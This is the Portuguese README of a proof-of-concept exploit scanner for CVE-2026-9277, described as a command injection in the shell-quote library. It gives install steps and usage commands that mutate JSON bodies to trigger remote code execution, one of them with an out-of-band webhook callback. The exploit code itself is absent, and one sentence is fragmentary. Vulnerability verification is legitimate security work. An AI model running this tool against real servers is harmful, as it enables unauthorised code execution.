
Exploit de prova de conceito para CVE-2026-9277, uma vulnerabilidade de injeção de comandos na biblioteca shell-quote. Realiza travessia JSON recursiva com mutação combinatória para acionar RCE, suportando verificação OOB e registro sem ruído.
Um script de exploit Proof of Concept (PoC) especializado, projetado para verificar e demonstrar CVE-2026-9277 — uma vulnerabilidade estrutural de Injeção de Comando encontrada em versões legadas da biblioteca shell-quote (<= 1.8.3).
O scanner realiza manipulação estrutural profunda em payloads JSON de entrada para expor vetores de execução remota de código (RCE) através de travessia recursiva, prevenindo falsos positivos usando um motor de temporização de linha de base de rede dinâmica.
{"op": "..."} dos argumentos para contornar com sucesso os controles de isolamento de strings.Certifique-se de ter Python 3.10+ e os pacotes necessários instalados:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
